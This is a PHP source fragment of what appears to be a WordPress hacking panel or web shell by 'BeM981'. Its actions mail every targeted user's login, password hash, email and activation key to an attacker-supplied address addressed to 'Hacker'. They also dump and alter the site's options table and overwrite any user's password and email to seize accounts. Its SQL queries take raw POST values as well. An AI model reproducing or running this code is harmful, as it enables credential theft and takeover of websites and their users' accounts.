            if(is_wp_error($user[$i])){ die("Now User With This name : {$user[$i]}"); }
           
           if(strpos($_POST['email'],"@") === false) die("Error in Email Missing (@)");           
           
           $email = $_POST['email'];
           
           if(!isset($_POST['type'])) $type = 'mail'; else $type = $_POST['type'];
           
           
           $title = "User ".$_SERVER['HTTP_HOST']." Data Total User : ".count($user);
           
           $msg = <<<MSG
            <!DOCTYPE HTML>        
            <html dir="ltr" lang="en-us">
            <head>
            <title>{$_SERVER['HTTP_HOST']} Users WordPress Data</title>
            </head>
            <body>
            <style type="text/css">
                        body{
                            background-color:#e5e4e5;
       
                        } 
                        h1{
                            width:100%;
                            text-align:center;
                            background-color:auto;
                            color:$color;
                        }
                        h1:hover,h2:hover{
                            border:1px solid $color;  
                            background-color:$color;  
                            color:#f3f3f3;
                        }
                	table.mi{ text-align:left; }
	                table.mi tr:hover{ background-color:$color; color:#e4e5e4;}
	                   div.msg{background-color:#e4e5e4; color:$color;}
	                   #note{text-align:center; width:100%; color:$color;}
            </style>
            <h1>{$_SERVER['HTTP_HOST']} Users Data</h1>
            <div class="msg">As Following Your Last Action On My Script <br />
            You Ask Me To Send To You Users Data <br />
            So The User You Ask For :
MSG;
            $i = null; unset($i);
            
            $UserData = "<br />";
            
            for($i = 0 ; $i < count($user); $i++){
            
                $UserData .= "User : ".$user[$i][0]->user_login."<br />";
                
                   
            }
            
            $msg .=$UserData;
            
            $msg .="So The Data For These Users Is : ";
            
                        $i = null; unset($i);
            
            $UserDataTable = "<br /><center><table class='mi'>";
            
            $UserDataTable .="<tr><td>User ID</td><td>User Login</td><td>User Password</td><td>User Nicename</td>
            <td>User Email</td><td>User Url</td><td>User Activation Key</td><td>User Online</td><td>User Registered</td></tr>";
            
            for($i = 0 ; $i < count($user); $i++){
            
                $UserDataTable .= "<tr>";
                $UserDataTable .= "<td>{$user[$i][0]->ID}</td>";
                $UserDataTable .= "<td>{$user[$i][0]->user_login}</td>";
                $UserDataTable .= "<td>{$user[$i][0]->user_pass}</td>";
                $UserDataTable .= "<td>{$user[$i][0]->user_nicename}</td>";
                $UserDataTable .= "<td>{$user[$i][0]->user_email}</td>";
                $UserDataTable .= "<td>{$user[$i][0]->user_url}</td>";
                $UserDataTable .= "<td>{$user[$i][0]->user_activation_key}</td>";
                $UserDataTable .= "<td>{$user[$i][0]->user_status}</td>";
                $UserDataTable .= "<td>{$user[$i][0]->user_registered}</td>";                
                $UserDataTable .= "</tr>"; 
            }
            
            $UserDataTable .="</table></center> <br />";
            
            $msg .= $UserDataTable;
            
            $msg .= "Note I Give You A Hash Password Because I Can't Crack It <br />";
            
           $msg .= "You Must Know When admin Site know About Your Attack Hi will Change All information <br />";
           
           $msg .= "I Think That <br /> </div>";
           
           $msg .= "<div id='note'> Message End Have Fun By BeM981 </div>";
            
            // To send HTML mail, the Content-type header must be set
                $headers  = 'MIME-Version: 1.0' . "\r\n";
                $headers .= 'Content-type: text/html; charset=UTF-8' . "\r\n";
                $headers .= 'To: Hacker <'.$_POST['email'].'>' . "\r\n";
                $headers .= 'From: '.$_SERVER['HTTP_HOST'].' <'.$_SERVER['SERVER_ADMIN'].'>' . "\r\n";
                $headers .= 'Reply-To: '.$_POST['email'].'' . "\r\n" .
                $headers .= 'X-Mailer: PHP/' . phpversion();
            
                require_once( ABSPATH . WPINC . '/class-smtp.php' );
                require_once( ABSPATH . WPINC . '/class-phpmailer.php' );
                
                //You Will See Under I Make Every Thing twice
                $mail = new PHPMailer();
                
                $mail->CharSet          =       'UTF-8';
                           
                $mail->ContentType      =       'text/html';
                
                $mail->From             =       $_SERVER['SERVER_ADMIN'];
                
                $mail->FromName         =       $_SERVER['HTTP_HOST']; 
            
                $mail->Subject          =       $title;
                
                $mail->Body             =       $msg;
                
                $mail->Mailer           =       $type;
                
                $mail->Host             =       iniget('SMTP');
                
                $mail->Port             =       iniget('smtp_port');
                
                $mail->Username         =       get_option('mailserver_login');
                
                $mail->Password         =       get_option('mailserver_pass');
                
                $mail->IsHTML(true);
                
                if($type == "mail") $mail->IsMail();
                elseif($_POST['type'] == "smtp") $mail->IsSMTP(); 
                elseif($_POST['type'] == "sendmail") $mail->IsSendmail();
                
                $mail->AddAddress($email);
                
                $mail->AddReplyTo($email);
                
                $mail->SetFrom($_SERVER['SERVER_ADMIN'],$_SERVER['HTTP_HOST']);
                
                if($mail->Mailer == "smtp")
                {
                 $mail->SmtpConnect();
                }
                
                if(!$mail->Send()) die("Error In Send Mail");
                echo "Email Send Done Have Fun";
                
                
    elseif($_POST['a'] == "gbi"):
        dir_in($_POST['path']);
         
        
        if(!isset($_POST['page']) || !isset($_POST['upp']) || !isset($_POST['ty']) || !isset($_POST['order']) ) die("Missing some thing");
        
        if(@!empty($_POST['page']) || isset($_POST['page'])) $page = $_POST['page']; else $page = 0;
        
        $l1 = $_POST['upp'] * $page + $_POST['upp'];
        $l2 = $page * $_POST['upp'] ;
        
        $order = $_POST['order'];
        
        $type = $_POST['ty'];
        
        $options = $wpdb->get_results( "SELECT * FROM `{$wpdb->options}` ORDER BY `{$order}` {$type} LIMIT {$l2},{$l1};--" );
        
        $total = $wpdb->get_results("select count(*) from {$wpdb->options}",ARRAY_N);
        
        $i = null; unset($i);
        echo "<center><table class='mi'>";
        echo "<tr><td>Id</td><td>Name</td><td>Value</td><td>Auto Load</td></tr>";
        
        
        for($i = $page * $_POST['upp']; $i < count($options); $i++){

            
            echo "<tr>";
            echo "<td>{$options[$i]->option_id}</td>";
            echo "<td>{$options[$i]->option_name}</td>";
            echo "<td>".htmlspecialchars($options[$i]->option_value)."</td>";
            echo "<td>{$options[$i]->autoload}</td>";
            echo "</tr>";        
        }
               $page1 = pr($total[0][0],$_POST['upp']);
        
       echo "<tr><td></td><td>Total Options : ".$total[0][0]." </td><td>".$page1."</td><td></td></tr>";
       echo "</table></center><br /><br /><br /><br /><br /><br />";
    elseif($_POST['a'] == "chbd"):
        dir_in($_POST['path']);
        if(!isset($_POST['name']) or !isset($_POST['value'])) die("Some Data Missing");
        
        $op = $wpdb->get_results("select `option_id` from `{$wpdb->options}` where `option_name` = '{$_POST['name']}';");
        
        $wpdb->update($wpdb->options,array('option_value' => $_POST['value']),array('option_id' => $op[0]->option_id , 'option_name' => $_POST['name'] )) or die("Can't Change");
        echo "Change Done <br /><br /><br /><br />";
    
    elseif($_POST['a'] == "chud"):
        dir_in($_POST['path']);

        
        if(isset($_POST['user']) and isset($_POST['pass']) and isset($_POST['pass2']) and isset($_POST['email']) and isset($_POST['nice']) and isset($_POST['ak']) and isset($_POST['dn']))
        {
            if($_POST['pass'] != $_POST['pass2']) die("Your Password Doesn't Match");
            $pass = wp_hash_password($_POST['pass']) or die("Can't Make Hash For Password");

            if(strpos($_POST['email'],"@") === false) die("Invalid Email!");   
            
            $id = get_user_by( 'login' , $_POST['user']);
             
             $id = $id->ID;
                
            $wpdb->update($wpdb->users, 
            array(
            'user_login' => $_POST['user'] ,
            'user_pass' =>  $pass,
            'user_nicename' => $_POST['nice'] ,
            'user_email' => $_POST['email'] ,
            'user_activation_key' => $_POST['ak'] ,
            'display_name' => $_POST['dn']            
            ), 
            array('ID' => $id)) or die("Can't Change");    
            echo "Data Change Done";        
            
        }else{
            die("Some Data Is Missing");
        }
    elseif($_POST['a'] == "geta"):
        dir_in($_POST['path']);
        if(@!empty($_POST['page'])) $page = $_POST['page']; else $page = 0;
        
        $l1 = 10 * $page + 10;
        $l2 = $page * 10 ;
        $q=$wpdb->get_results("select * from `{$wpdb->users}` LIMIT {$l2},{$l1};");
        
        $total= $wpdb->get_results("select count(*) from `{$wpdb->users}`",ARRAY_N);
        
            echo "<center><table class='mi'>";
            echo "<tr><td>User ID</td><td>User Login</td><td>User Password</td><td>User Nicename</td>
                    <td>User Email</td><td>User Url</td><td>User Activation Key</td><td>User Online</td><td>User Registered</td></tr>";
                    
        for($i = 0; $i < count($q) ; $i++){
            @$user = get_userdata( $q[$i]->ID );
            
            echo "<tr>";
            echo "<td>{$user->ID}</td>";
            echo "<td>{$user->user_login}</td>";
            echo "<td>{$user->user_pass}</td>";
            echo "<td>{$user->user_nicename}</td>";
            echo "<td>{$user->user_email}</td>";
            echo "<td>{$user->user_url}</td>";
            echo "<td>{$user->user_activation_key}</td>";
            echo "<td>{$user->user_status}</td>";
            echo "<td>{$user->user_registered}</td>";
            echo "</tr>";
       }
       $page1 = pr($total[0][0],10);
        
       echo "<tr><td>Total User : ".$total[0][0]." </td><td>".$page1."</td></tr>";
       echo "</table></center><br /><br /><br /><br /><br /><br />";
       
      
    else:
    echo "There Is No action Like That.";
    endif;

?>
</div>
<!-- End Result -->
<hr color="<?=$color?>" />
<p class="footer">(Muslims Hackers)By BeM981 >> Free Version</p>
</body>
</html>
<!-- CopyRight By BeM981 Dev It Don't Sreal it -->
